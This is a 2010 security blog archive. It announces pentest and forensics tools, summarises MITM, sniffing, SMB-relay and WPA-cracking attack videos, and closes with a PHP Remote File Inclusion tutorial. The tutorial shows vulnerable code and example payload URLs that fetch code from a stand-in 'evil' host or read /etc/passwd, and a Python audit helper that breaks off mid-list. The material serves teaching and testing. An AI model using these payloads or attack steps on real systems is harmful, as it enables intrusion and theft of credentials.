Monday, August 23, 2010

Forensic Toolkit (FTK) Version 3


Forensic Toolkit® (FTK®) is recognized around the world as the standard in computer forensics software. This court-validated digital investigations platform delivers cutting-edge computer forensic analysis, decryption and password cracking all within an intuitive and customizable interface. FTK 3 is built for speed, analytics and enterprise-class scalability. Known for its intuitive interface, email analysis, customizable data views and stability, FTK lays the framework for seamless expansion, so your computer forensics solution can grow with your organization’s needs. Forensic Toolkit 3 is now the most advanced computer forensics software available, providing functionality that normally only organizations with tens of thousands of dollars could afford.


See also Review: Access Data Forensic Toolkit (FTK) Version 3 — Part 1

Sunday, August 8, 2010

BackTrack 4 Release 1

The BackTrack Team is proud to announce the public release of BackTrack 4 R1. At the risk of sounding like a broken record, we believe this version is by far the best version released to date. With a shiny new 2.6.34 kernel, there are many significant improvements, such as expanded hardware support and improved desktop responsiveness.

Tools have been updated system-wide, and a full Fluxbox desktop environment has been added. A workaround for the rt28xx driver has been implemented (for all you AWUS050NH owners).
The VMware version has complete integration with VMware Tools, which provides seamless interaction with BackTrack in a virtual environment.

More info and download:

Monday, August 2, 2010

OWASP O2 Platform v1.1 Beta

The OWASP O2 Platform is an OWASP Project consisting of a collection of open source modules that help web application security professionals maximize their efforts and quickly obtain high visibility into an application's security profile. The objective is to "Automate Application Security Knowledge and Workflows".

Download: Here


Thursday, July 29, 2010

XSSer v0.6 - "XSSer Storm"

XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.
It contains several options to try to bypass certain filters, and various special techniques of code injection.

XSSer v0.6a aka "XSSer Storm!" supports these new features:
-g DORK Process search engine dork results as target urls
--Ge=DORK_ENGINE Search engine to use for dorking (scroogle, duck, altavista, bing)
-c CRAWLING Crawl target hierarchy parameters (can be slow!)
--Cw=CRAWLING_WIDTH Number of urls to visit when crawling
--Dfo Encodes fuzzing IP addresses in DWORD format


Thursday, July 22, 2010

"Backup" Tools For Mysql Administration


MySQLDumper is a script for backing up MySQL databases written in PHP and Perl. It uses a proprietary technique to avoid execution interruption by reading and saving a certain amount of commands, then calling itself via JavaScript to memorize how far in the process it was. Finally, the script resumes its action from last standby.



phpMyBackup Pro is a very easy to use, free, web-based MySQL backup script, licensed under the GNU GPL. The script supports many operations, such as: backup of one or several databases with or without data and table structure; backup directly onto an FTP server and sending of backups by email; managing, restoring and scheduling backups, and others. phpMyBackup Pro is platform independent: it requires only a web server and PHP.


A shell script to take daily, weekly and monthly backups of MySQL databases using mysqldump. Its features include: backing up multiple databases, creating a backup into a single backup file or into a separate file for each DB, backup file compression, backup to a remote server, e-mailing the user when the backup is completed, and others.



Backup2Mail is a PHP script that creates regular backups of MySQL databases and sends them to configurable e-mail address. The whole process can be scheduled with a help of Cron (for Unix/Linux) or with Task Scheduler (for Windows).



mylvmbackup is a utility for creating MySQL backups via LVM snapshots. To perform this, mylvmbackup obtains a read lock on all tables, flushes all server caches to disk, creates a snapshot of the volume containing the MySQL data directory and unlocks the tables again. The LVM snapshot is mounted to a temporary directory and all data is backed up using the tar or rsync program. The script requires Perl 5 and the LVM utilities.


MyPHPdumpTool (mpdt)

MyPHPdumpTool is a PHP (CLI) based MySQL backup tool that can be configured to automatically archive and upload any database-dump file to any FTP server. The backup process can be scheduled with a help of Cron (for Unix/Linux) or with Task Scheduler (for Windows).


mysqlblasy (MySQL backup for lazy sysadmins)

mysqlblasy is a Perl script for automating MySQL database backups. The main feature of this script is automatic backup rotation, so that the backup disk does not fill up while the administrator is on vacation (or is lazy). Each database gets dumped into a separate file, after which all the dumps get tarred/compressed and placed into the specified backup directory. Old files in the backup directory get deleted; the number of newest files to keep is specified in the configuration file.

Sypex Dumper Lite

Sypex Dumper Lite is a PHP script for quick and easy MySQL database backup, developed by specialists at a Ukrainian company. The script is very fast with databases of all sizes (small or large) because it uses a special technique for dumping: the backup file is not stored entirely in memory.


Monday, July 12, 2010

Safe3 SQL Injector

Safe3 SQL Injector is one of the most powerful penetration testing tools that automate the process of detecting and exploiting SQL injection flaws and taking over back-end database servers.

Full support for GET/POST/Cookie injection
Full support for HTTP Basic, Digest, NTLM and Certificate authentication
Full support for MySQL, Oracle, PostgreSQL, MSSQL, Access, DB2, Sybase, SQLite
Full support for Error/Union/Blind/Force SQL injection
Support for file access, command execution, IP domain reverse lookup, web path guessing, MD5 cracking, etc.
WAF bypass


Thursday, July 8, 2010


A very fast network logon cracker which supports many different services.
Currently this tool supports:


Changelog for 5.7:

* Added ncp support plus minor fixes (by David Maciejak @ GMAIL dot com)
* Added an old patch to fix a memory from SSL and speed it up too from kan(at)
* Removed unnecessary compiler warnings
* Enhanced the SSH2 module based on an old patch from aris(at)
* Fixed small local defined overflow in the teamspeak module. Does it still work anyway??


Wednesday, July 7, 2010

Maltego version 3

Maltego is an open source intelligence and forensics application. It offers timely mining and gathering of information as well as the representation of this information in an easy to understand format.

Maltego can be used for the information gathering phase of all security related work. It will save you time and will allow you to work more accurately and smarter.
Maltego aids you in your thinking process by visually demonstrating interconnected links between searched items.
Maltego provides you with a much more powerful search, giving you smarter results.
If access to "hidden" information determines your success, Maltego can help you discover it.

Download and more info:

Monday, July 5, 2010


NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows that can detect the OS, hostname and open ports of network hosts through packet sniffing or by parsing a PCAP file. NetworkMiner can also extract transmitted files from network traffic including common image file formats = fun !


Thursday, July 1, 2010

SSLCertScanner : New Tool to Scan for SSL Certificates on Network

SSLCertScanner is a free network-based SSL certificate scanner. It can remotely scan the SSL certificate on any host present on the intranet or Internet, and it can scan a single host or multiple hosts at a time. Once the SSL certificate is discovered, SSLCertScanner automatically validates it by checking its expiry date.
SSLCertScanner supports HTTPS as well as LDAPS based SSL services for certificate scanning. During the scan it displays a detailed status message for the current operation on each host.


Monday, June 28, 2010

Xplico 0.5.7 - VoIP "Wire" Tapping

Xplico is an open source Network Forensic Analysis Tool. Its goal is to extract the application data contained in an Internet traffic capture. From a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on.

This release introduces improvements in the SIP and RTP dissectors.
This version also adds an RTCP dissector, with which Xplico is able to obtain the phone numbers of the caller and called party (obviously only if present in the RTCP packets).

DEFT 5.1 Live distribution contains this version.

Download :

Sunday, June 27, 2010

DEFT Linux 5.1 Computer Forensic Live CD

DEFT Linux is a highly specialized Linux distribution aimed at forensic computing. It comes with a number of dedicated tools and is a computer investigator’s best friend. The latest release, DEFT Linux 5.1, is a small maintenance update, which brings some newer packages and fixes a couple of bugs.

What’s new?
Update: Sleuthkit 3.1.1 and Autopsy 2.24
Update: Xplico to 0.5.7 (100% support of SIP – RTP codec g711, g729, g722, g723 and g726, SDP and RTCP)
Update: Initrd
Bug fix: Dhash report (reports were not generated)
Bug fix: DEFT Extra (a few tools did not work if the operator clicked on their icons; added the dd tool for x64 machines)


Thursday, June 24, 2010

Live Hacking Linux Security Distro Bootable CD

Live Hacking CD is a new Linux distribution packed with tools and utilities for ethical hacking, penetration testing and countermeasure verification. Based on Ubuntu, this "Live CD" runs directly from the CD and doesn't require installation on your hard drive. Once booted you can use the included tools to test, check, ethically hack and perform penetration tests on your own network to make sure that it is secure from outside intruders.

The CD comes in two forms. A full Linux desktop including a graphical user interface (GNOME) and applications like Firefox along with tools and utilities for DNS enumeration, reconnaissance, foot-printing, password cracking and network sniffing. For greater accessibility there is a Live Hacking menu to help you quickly find and launch the tools.

The second variation is the Live Hacking Mini CD, which is command line only. However this doesn't detract from the power of the tools and utilities included as most of the penetration testing and ethical hacking tools are command line tools. The included /lh directory has symbolic links to the different tools included.


Tuesday, June 22, 2010

Lens version

Lens ASP.NET Penetration Testing Tool

Lens is an open-source ethical hacking tool specialized to penetration testing of ASP.NET web applications. Lens is written in WPF 4 and its internal modular architecture allows us to easily add new tests to the system.
Base features
Resize-friendly window structure
Window position is preserved across sessions
Built-in zoom
Detailed log window
Links to online information about the attacks and fixes

You can use our Lens tool to test your site against the following attacks
Session state
Session fixation (available in v.
Forms authentication
Eavesdropping (available in v.
Information disclosure (available in v.
Event handler bypass
Event handling
Postback to disabled controls
Postback to invisible controls
One-click attack


Sunday, June 20, 2010

Bruter 1.0

Bruter is a parallel network login brute forcer for the Win32 platform only. It currently supports the following services: FTP, HTTP (Basic), HTTP (Form), IMAP, MSSQL, MySQL, POP3, SMB-NT, SMTP, SNMP, SSH2, Telnet, VNC.

To see the full changelog since the alpha version, check:


Wednesday, June 16, 2010

Social-Engineering Toolkit


The Social-Engineering Toolkit (SET) is a Python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. Its main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed. Currently SET has two main methods of attack: the first utilizes Metasploit payloads and Java-based attacks by setting up a malicious website that ultimately delivers your payload. The second method is through file-format bugs and e-mail phishing; it supports your own open mail relay, a customized sendmail open relay, or Gmail integration to deliver your payloads through e-mail. The goal of SET is to bring awareness to the often forgotten attack vector of social engineering.


For more info and video demo check: David Kennedy (ReL1K) website

Monday, June 14, 2010

x5s - Automated Cross-Site Scripting

x5s is a Fiddler addon which aims to assist penetration testers in finding cross-site scripting vulnerabilities. Its main goal is to help you identify the hotspots where XSS might occur by:

  • Detecting where safe encodings were not applied to emitted user-inputs
  • Detecting where Unicode character transformations might bypass security filters
  • Detecting where non-shortest UTF-8 encodings might bypass security filters
It injects ASCII to find traditional encoding issues, and it injects special Unicode characters and encodings to help an analyst identify where XSS filters might be bypassed. The approach to finding these hotspots involves injecting single-character probes separately into each input field of each request, and detecting how they were later emitted. The focus is on reflected XSS issues however persisted issues can also be detected. The idea of injecting special Unicode characters and non-shortest form encodings was to identify where transformations occur which could be used to bypass security filters. This also has the interesting side effect of illuminating how all of the fields in a Web-app handle Unicode. For example, in a single page with many inputs, you may end up seeing the same test case get returned in a variety of ways – URL encoded, NCR encoded, ill-encoded, raw, replaced, dropped, etc. In some cases where we’ve had Watcher running in conjunction, we’ve been able to detect ill-formed UTF-8 byte sequences which is indicative of ‘other’ problems.

x5s acts as an assistant to the security tester by speeding up the process of parameter manipulation and aggregating the results for quick viewing. It automates some of the preliminary XSS testing work by enumerating and injecting canaries into all input fields/parameters sent to an application and analyzing how those canaries were later emitted. E.g. Was the emitted output encoded safely or not? Did an injected character transform to something else?

x5s does not inject XSS payloads - it does not attempt to exploit or confirm an XSS vulnerability. It's designed to draw your attention to the fields and parameters which seem likely candidates for vulnerability. A security-tester would review the results to find issues where special characters were dangerously transformed or emitted without a safe encoding. This can be done by quickly scanning the results, which have been designed with the intention of providing quick visual inspection. Results filters are also included so the tester could simply click show hotspots to see only the potential problem areas. After identifying a hotspot it's the tester's job to perform further validation and XSS testing.

The types of test cases that x5s includes:
  1. Traditional test cases - characters typically used to test for XSS injection such as <, >, " and ' which are used to control HTML, CSS, or JavaScript;
  2. Transformable test cases - characters that might uppercase, lowercase, normalize, best-fit map, or otherwise transform to completely different characters, e.g. the Turkish 'İ' which will lower-case to 'i' in culture-aware software.
  3. Overlong UTF-8 test cases - non-shortest UTF-8 encodings of the 'traditional' test cases noted above, e.g. the ASCII < is 0x3C normally and 0xC0 0xBC in non-shortest form UTF-8.
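As an added example (Python, not x5s's own code, which is a Fiddler addon), the analysis step described above: a one-character probe is bracketed by constructed PREFIX/SUFFIX markers, located in the response body, and sorted into raw, URL-encoded, HTML-encoded, overlong UTF-8, ill-encoded, transformed or dropped, with the 0xC0 0xBC style overlong form built and checked explicitly. The markers, parameter names and sample responses are constructed for the demonstration.

```python
import html
import unicodedata
from urllib.parse import quote

# Constructed bracketing tokens (an assumption, not the markers x5s uses): each
# probe is sent as PREFIX + probe + SUFFIX so its reflection can be located
# however the application re-encoded it.
PREFIX = b"x5sL"
SUFFIX = b"x5sR"

# Emission classes that make a parameter a hotspot for manual XSS review.
HOTSPOT_CLASSES = {"raw", "overlong-utf8", "ill-encoded"}


def utf8_with_length(ch: str, nbytes: int) -> bytes:
    """Encode one character as a UTF-8 sequence of exactly nbytes bytes.

    With nbytes above the shortest valid length this is the non-shortest
    ("overlong") form: '<' (0x3C) becomes 0xC0 0xBC for nbytes=2. RFC 3629
    forbids such sequences, but a lenient decoder sitting behind an input
    filter may still map them back to '<' after the filter has passed them.
    """
    cp = ord(ch)
    if nbytes not in (2, 3, 4) or cp >= 1 << (5 * nbytes + 1):
        raise ValueError("code point does not fit in %d bytes" % nbytes)
    lead = {2: 0xC0, 3: 0xE0, 4: 0xF0}[nbytes] | (cp >> (6 * (nbytes - 1)))
    tail = [0x80 | ((cp >> (6 * i)) & 0x3F) for i in range(nbytes - 2, -1, -1)]
    return bytes([lead] + tail)


def find_overlong(data: bytes) -> list:
    """Offsets of overlong UTF-8 sequences in data, per RFC 3629: lead bytes
    0xC0/0xC1 are never valid, and 0xE0 / 0xF0 must be followed by a
    continuation byte of at least 0xA0 / 0x90 respectively."""
    hits = []
    for i in range(len(data) - 1):
        b, nxt = data[i], data[i + 1]
        if not 0x80 <= nxt <= 0xBF:
            continue
        if b in (0xC0, 0xC1) or (b == 0xE0 and nxt < 0xA0) or (b == 0xF0 and nxt < 0x90):
            hits.append(i)
    return hits


def _skeleton(s: str) -> str:
    """Compatibility-normalize, drop combining marks and fold case, so that a
    Turkish 'İ' compares equal to 'i' and a fullwidth '＜' to '<'."""
    decomposed = unicodedata.normalize("NFKD", s)
    return "".join(c for c in decomposed if unicodedata.category(c) != "Mn").casefold()


def classify_emission(probe: str, body: bytes) -> str:
    """Describe how the bracketed probe was emitted in the response body."""
    start = body.find(PREFIX)
    end = body.find(SUFFIX, start + len(PREFIX)) if start >= 0 else -1
    if end < 0:
        return "not-reflected"
    emitted = body[start + len(PREFIX):end]
    raw = probe.encode("utf-8")
    if emitted == raw:
        return "raw"                      # dangerous for < > " '
    if emitted == b"":
        return "dropped"
    if emitted == quote(probe, safe="").encode("ascii"):
        return "url-encoded"              # %3C
    if any(emitted == utf8_with_length(probe, n) for n in range(len(raw) + 1, 5)):
        return "overlong-utf8"            # 0xC0 0xBC and longer forms
    try:
        text = emitted.decode("utf-8")
    except UnicodeDecodeError:
        return "ill-encoded"              # other invalid byte sequences
    if html.unescape(text) == probe:
        return "html-encoded"             # &lt; &#60; &#x3c;
    if _skeleton(text) == _skeleton(probe):
        return "transformed"              # case, best-fit or normalization
    return "replaced"


def hotspots(results: dict) -> list:
    """Parameter names whose emission class needs manual follow-up."""
    return sorted(name for name, cls in results.items() if cls in HOTSPOT_CLASSES)


# Constructed sample: how five parameters of one imaginary page reflected '<'.
SAMPLE_RESPONSES = {
    "q": PREFIX + b"&lt;" + SUFFIX,                      # safely HTML-encoded
    "name": PREFIX + b"<" + SUFFIX,                      # emitted raw
    "lang": PREFIX + utf8_with_length("<", 2) + SUFFIX,  # 0xC0 0xBC overlong
    "page": PREFIX + b"%3C" + SUFFIX,                    # URL-encoded
    "filter": PREFIX + SUFFIX,                           # character dropped
}


def scan_sample() -> dict:
    """Classify every constructed response for the '<' probe."""
    return {name: classify_emission("<", body) for name, body in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    results = scan_sample()
    for name, cls in results.items():
        print("%-7s %s" % (name, cls))
    print("hotspots:", hotspots(results))
```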

Friday, June 11, 2010

W3af v1.0-rc3

W3af is a Web Application Attack and Audit Framework. The w3af core and its plugins are fully written in Python. The project has more than 130 plugins, which check for SQL injection, cross site scripting (XSS), local and remote file inclusion and much

The development team is proud to announce a new w3af release! Some of the features of the 1.0-rc3 version are:

* Enhanced GUI, including huge changes in the MITM proxy and the Fuzzy Request Editor
* Increased speed by rewriting parts of the thread management code
* Fixed tons of bugs
* Reduced memory usage
* Many plugins were rewritten using different techniques that use less HTTP requests to identify the same vulnerabilities
* Reduced false positives

You can download the latest versions from the official w3af website:

Thursday, June 10, 2010


Jacknsee is an educational network security tool. Its purpose is to teach computer science students how basic hijacking techniques are used to corrupt a network. A few examples are given: man in the middle, DoS, stack buffer overflow attack.

Video demo:

Download and more info:

Tuesday, June 8, 2010

SamuraiWTF 0.8

Web penetration testing live CD built on open source software

The Samurai Web Testing Framework is a live Linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.

This version includes Metasploit, target applications and tons of tool updates. It is now DVD sized as it has outgrown the CD release.

More info and Download:

Monday, June 7, 2010

SpiderLabs Defacetool

DefaceTool is an open-source Java Server Faces (JSF) testing tool for decoding view state and creating view state attack vectors. The tool can be used to create XSS attacks and session and application scope attacks against Apache MyFaces 1.2.8 applications. The tool has been architected to be extensible and can be modified to support other versions of Apache MyFaces and Sun Mojarra.


Friday, June 4, 2010

D-Link Routers: One Hack to Own Them All

Multiple D-Link Routers Vulnerable to Authentication Bypass

Multiple D-Link routers suffer from insecure implementations of the Home Network Administration Protocol which allow unauthenticated and/or unprivileged users to view and configure administrative settings on the

Further, the mere existence of HNAP allows attackers to completely bypass the CAPTCHA login features that D-Link has made available in recent firmware releases.

These vulnerabilities can be exploited by an individual inside the local network, as well as an external attacker.

It is suspected that most, if not all, D-Link routers manufactured since 2006 have HNAP support and are vulnerable. However, only the following routers and firmware versions have been confirmed to date:

1) DI-524 hardware version C1, firmware version 3.23
2) DIR-628 hardware version B2, firmware versions 1.20NA and
3) DIR-655 hardware version A1, firmware version 1.30EA

You can read full write-up here, and download POC tool, HNAP0wn, here.

Wednesday, June 2, 2010


WebRaider is a plugin-based automated web application exploitation tool which focuses on getting a shell from multiple targets or injection points.

Internally WebRaider uses Metasploit. We use a specific version of Metasploit. We trim the fat from Metasploit to launch it faster and make it smaller. You can change the paths and make it work with the latest Metasploit of your own setup.

Note: Your antivirus won't like the WebRaider download package as it includes reverse shell executables and other metasploit files.

WebRaider Presentation and White Paper and Download

Monday, May 31, 2010

Plecost: Wordpress Finger Printer

Plecost is a WordPress fingerprinting tool that searches for and retrieves information about the plugin versions installed on WordPress systems. It can analyze a single URL or perform an analysis based on the results indexed by Google. Additionally it displays the CVE identifiers associated with each plugin, if any.

Plecost retrieves the information contained on Web sites supported by Wordpress, and also allows a search on the results indexed by Google.


Thursday, May 27, 2010


Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe.

Although it has been two years since the concept was first introduced, most websites still have not implemented effective protection against clickjacking. In part, this may be because of the difficulty of visualising how the technique works in practice.

This new browser-based tool allows a user to experiment with clickjacking techniques by using point-and-click to visually select different elements within a webpage to be targeted. The tool also allows several 'next-generation' clickjacking techniques to be used, as introduced in Paul Stone's Blackhat Europe 2010 talk.

Among the features of the new tool are:
Use point-and-click to select the areas of a page to be targeted
Supports the new 'text-field injection' technique
Supports the new 'content extraction' technique
'Visible mode' replay allowing a user to see how the technique works behind the scenes
'Hidden mode' replay allows the same steps to be replayed in a hidden manner, simulating a real clickjacking attack.
The tool is currently in an early beta stage, and works best in Firefox 3.6. Full support for other browsers will follow shortly. For further information, please see the Readme.txt file in the downloadable tool.

Monday, May 24, 2010

Cracking WPA2 Password Using Pyrit (GPU Cracking)

This video shows how to attack wireless networks using the Pyrit tool. Pyrit is a GPU cracker for attacking the WPA/WPA2-PSK protocols. It allows creating massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time trade-off. Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK. Download and other details can be found here.

Thursday, May 20, 2010

Nmap Using TOR Networks


A good video showing how to scan networks with Nmap using the Tor network to stay anonymous.
An attacker downloads and configures TorTunnel, the Tor bundle and proxychains. After setting up everything, the attacker uses Nmap to find out the services running on different IP addresses. The main purpose of this video is to show how to stay anonymous while scanning different networks.

Monday, May 17, 2010

Milw0rm Exploits Archive

A live demo on how to use the latest exploits from milw0rm on the BackTrack live distro in detail. In this video, the attacker launches an attack against a Dream FTP Server running on a Windows box to crack the administrator's password.

Thursday, May 13, 2010

Karmetasploit on Backtrack4

This video is about using the karma exploit from Metasploit on BackTrack 4. An attacker sets up his own fake access point in monitor mode, a DHCP daemon and a web server daemon, then runs Metasploit's karma exploit. The moment an IP address is assigned to the victim's PC, all the activity is logged at the attacker's machine, including the URLs visited and the credentials used for mail and web access.

Monday, May 10, 2010

Sniffing And HTML Injection

This video explains various examples of network sniffing and HTML injection with the Ettercap-NG tool on BackTrack 4 in a local area network. It shows how an attacker can change the text of chat messages within Live Messenger using Ettercap filters, and also using the Ettercap plugin, Filters, filterf_modify and file-inject. An attacker can even find who else is ARP poisoning on the LAN using the search_poisoning Ettercap plugin.

Wednesday, May 5, 2010

Wireless Key Grabber

This video shows how to use Wireless Key Grabber. It requires lighttpd and runs a fake wireless access point to grab wireless keys. Whenever a user tries to connect to any website after connecting to this fake access point, his browser is forwarded to a customized URL. Metasploit DLL injection is used to grab the wireless key.

Download link is here :
Script information is here :

Monday, May 3, 2010

DNS Spoofing And Browser Spying Part 2

In this video an attacker sniffs network traffic from a remote machine using ARP and DNS spoofing with Ettercap. The Driftnet program is used to listen to network traffic and sniff out images from TCP streams on the network. Finally, the remote_browser plugin of Ettercap is used, which sends the URLs visited by the victim to the attacker's browser. In this way the attacker's browser follows whatever the victim is browsing.

Friday, April 30, 2010

DNS Spoofing And Browser Spying Part 1

This is the first video of three parts that explains various examples of sniffing using the Ettercap-NG tool, on BackTrack-4, in a Local Area Network scenario. This part explains OS Fingerprinting - Arp Poisoning and one example using Etterfilter.

Wednesday, April 28, 2010

HTML Injection in NASA Website

Last February 25, 2010 I made a full disclosure type of post here regarding multiple server "0-day" vulnerabilities. I believe most (if not all) of these live vulnerabilities have already been fixed thanks to the media like CBS News who broke it (together with the NSA defacement) to public in one of their "cyber war" reports involving the China Google hacking incident if my memory serves me right. Anyway, here is the last exploit which is a good example of html injection for those who are interested in studying it further.

Monday, April 26, 2010

Sniffing SSL Secured Logins with Ettercap

A short video showing how easy it is to intercept HTTPS traffic on a switched local network by spoofing the SSL certificate in a man-in-the-middle attack with Ettercap. The attacker uses one-way ARP poisoning on the victim and issues fake SSL certificates on a switched Ethernet network.

Friday, April 23, 2010

DHCP Spoofing MITM Attack Using Ettercap

This video shows how to spoof DHCP IP assignment using Ettercap. When a new PC configured to obtain its IP address dynamically from a DHCP server is added to the network, an attacker can spoof this IP assignment process and provide his own values, such as a gateway which has been configured to sniff usernames and passwords.

Thursday, April 22, 2010

Bluetooth sniffing in Linux

A very good video showing how to sniff a Bluetooth PIN while pairing two Bluetooth devices and then crack it.

Tuesday, April 20, 2010

Securing Web Applications

Securing Web Services - Presentation Transcript
  1. Securing Web Applications Tara Kissoon, CISA, CISSP Visa Inc.
  2. Objectives The participant will learn more about: How to integrate OWASP Top 10 to mitigate Web application security vulnerabilities.
  3. What is an application? An application: – Defined as user software – Is made up of a number of files, including configuration files, executable programs and data files. – Is layered above an operating system and uses the functionality of the operating system to deliver its service. – The operating system provides a number of mechanisms used for securing the application. – Contains security functionality that uses mechanisms not residing within the operating system.  
  4. This presentation is on Web Services Security, pointing at almost all of the fields that require attention for web application security. It shows how to effectively manage the application development lifecycle and how to integrate the OWASP Top 10 projects to develop any application keeping security in mind.

    A1 - Cross Site Scripting (XSS)
    A2 - Injection Flaws
    A3 - Malicious File Execution
    A4 - Insecure Direct Object Reference
    A5 - Cross Site Request Forgery (CSRF)
    A6 - Information Leakage and Improper Error Handling
    A7 - Broken Authentication and Session Management
    A8 - Insecure Cryptographic Storage
    A9 - Insecure Communications
    A10 - Failure to Restrict URL Access

Monday, April 19, 2010

Windows SMB Relay Exploit

In this Underground video, Overide demonstrates how to obtain root access on a fully patched Windows XP SP3 machine. He exploits a flaw in Windows Server Message Block (SMB), which is used to provide shared access to files between hosts on a network. Overide utilizes the Metasploit Framework to run the exploit. It works by relaying an SMB authentication request to another host, which provides Metasploit with an authenticated SMB session; if the user is an administrator, Metasploit will be able to execute code on the target computer, such as a reverse shell. For this exploit to run, the target computer must try to authenticate to Metasploit. Overide forces the target computer to perform an SMB authentication attempt by using an Ettercap filter.

A live demonstration of obtaining admin access on a Windows XP SP3 machine. It exploits a flaw in Windows Server Message Block (SMB), which provides shared access to files and folders on a network. The hacker utilizes the Metasploit Framework to run the exploit. It works by relaying an SMB authentication request to another host, which provides Metasploit with an authenticated SMB session; if the user is an administrator, Metasploit will be able to execute code on the target computer and can even get a reverse shell. The hacker forces the target computer to perform an SMB authentication attempt by using an Ettercap filter; for authentication, the target computer is forwarded to Metasploit.

Sunday, April 18, 2010

Remote Shell with a Word document

Using a Metasploit payload on Backtrack 4 to create a macro enabled Microsoft Word document which upon execution opens up a remote shell.

Friday, April 16, 2010


Honey Pot systems are decoy servers or systems set up to gather information regarding an attacker or intruder into your system. It is important to remember that Honey Pots do not replace other traditional Internet security systems; they are an additional level or system.

Honey Pots can be set up inside, outside or in the DMZ of a firewall design, or even in all of these locations, although they are most often deployed inside a firewall for control purposes. In a sense, they are variants of standard Intrusion Detection Systems (IDS) but with more of a focus on information gathering and deception.

An example of a Honey Pot system installed in a traditional Internet security design:
figure 1
A Honey Pot system is set up to be easier prey for intruders than true production systems, but with minor system modifications so that their activity can be logged or traced. The general thought is that once an intruder breaks into a system, they will come back for subsequent visits. During these subsequent visits, additional information can be gathered and additional attempts at file, security and system access on the Honey Pot can be monitored and saved.

Generally, there are two popular reasons or goals behind setting up a Honey Pot:
  1. Learn how intruders probe and attempt to gain access to your systems. The general idea is that since a record of the intruder’s activities is kept, you can gain insight into attack methodologies to better protect your real production systems.
  2. Gather forensic information required to aid in the apprehension or prosecution of intruders. This is the sort of information often needed to provide law enforcement officials with the details needed to prosecute.
The common line of thought in setting up Honey Pot systems is that it is acceptable to use lies or deception when dealing with intruders. What this means to you when setting up a Honey Pot is that certain goals have to be considered.

Those goals are:
  1. The Honey Pot system should appear as generic as possible. If you are deploying a Microsoft NT-based system, it should appear to the potential intruder that the system has not been modified, or they may disconnect before much information is collected.
  2. You need to be careful about what traffic you allow the intruder to send back out to the Internet, since you don't want to become a launch point for attacks against other entities on the Internet. (One of the reasons for installing a Honey Pot inside of the firewall!)
  3. You will want to make your Honey Pot an interesting site by placing "Dummy" information on it or making it appear as though the intruder has found an "Intranet" server, etc. Expect to spend some time making your Honey Pot appear legitimate, so that intruders will spend enough time investigating and perusing the system for you to gather as much forensic information as possible.
Some caveats exist that should be considered when implementing a Honey Pot system. Some of the more important are:

The first caveat is the consideration that if the information gathered from a Honey Pot system is used for prosecution purposes, it may or may not be deemed admissible in court. While information regarding this issue is difficult to come by, having been hired as an expert witness for forensic data recovery purposes, I have serious reservations regarding whether or not all courts will accept this as evidence or if non-technical juries are able to understand the legitimacy of it as evidence.

The second main caveat for consideration is whether hacking organizations will rally against an organization that has set "traps" and make them a public target for other hackers. Examples of this sort of activity can be found easily on any of the popular hacker’s sites or their publications.

Thursday, April 15, 2010

PHP Remote File Inclusion

Remote File Inclusion (RFI) is a technique used to attack websites from a remote computer. RFI allows malicious users to run their own PHP code on a vulnerable website, letting the attacker include and run any remote file just by editing the URL. A webshell included this way, for example, can display the files and folders on the server, add, edit or delete files and folders, send spam, and even get hold of root.

Remote File Inclusion (RFI) is a type of vulnerability most often found on websites; it allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity it can lead to, among other things:
  • Code execution on the web server
  • Code execution on the client-side such as Javascript which can lead to other attacks such as cross site scripting (XSS).
  • Denial of Service (DoS)
  • Data Theft/Manipulation

In PHP the main cause is the use of unvalidated external variables such as $_GET, $_POST and $_COOKIE with a filesystem function, most notably the include and require statements. Most of the vulnerabilities can be attributed to novice programmers not being familiar with all of the capabilities of the PHP programming language. PHP has an allow_url_fopen directive; if enabled, it allows filesystem functions to accept a URL, which lets them retrieve data from remote locations. An attacker alters a variable that is passed to one of these functions so that it includes malicious code from a remote resource. To mitigate this, all user input needs to be validated before being used.


Consider this PHP script (which includes a file specified by request):

   <?php
   // Default page when no COLOR parameter is supplied.
   $color = 'blue';
   // The request parameter is trusted as-is: this is the flaw.
   if (isset( $_GET['COLOR'] ) )
      $color = $_GET['COLOR'];
   // With allow_url_fopen enabled, $color may even name a remote URL.
   require( $color . '.php' );
The developer intended only blue.php and red.php to be used as options. But as anyone can easily insert arbitrary values into COLOR, it is possible to inject code from other files:
  • /vulnerable.php?COLOR=http://evil/exploit? - injects a remotely hosted file containing an exploit.
  • /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - executes code from an already uploaded file called exploit.php.
  • /vulnerable.php?COLOR=../../../../../../../../etc/passwd - allows an attacker to read the contents of the passwd file on a UNIX system (directory traversal).
  • /vulnerable.php?COLOR=C:\\notes.txt - example using the NULL meta character to remove the .php suffix, allowing access to files other than .php. (With magic_quotes_gpc enabled, special characters are escaped, which disables the use of the null character and so limits this attack.)
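As an added example, not code from the original post: a small Python audit helper that classifies COLOR values of the kinds listed above and applies the allowlist-plus-realpath check a fixed version of the script needs. The request lines, the vulnerable.php path and the web-root directory are all constructed.

```python
"""Classify the COLOR parameter of the script above and apply the allowlist
check a fixed version needs.  Added example, not code from the original post;
every request line and the web-root path below are constructed."""
import os
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# The developer only ever meant blue.php and red.php to be included.
ALLOWED_COLORS = {"blue", "red"}
# Constructed directory standing in for the web root that holds those files.
WEB_ROOT = "/var/www/app"

# Constructed request URIs, one per misuse class described above.
SAMPLE_REQUESTS = [
    "/vulnerable.php?COLOR=red",
    "/vulnerable.php?COLOR=http://evil/exploit?",
    "/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit",
    "/vulnerable.php?COLOR=../../../../../../../../etc/passwd",
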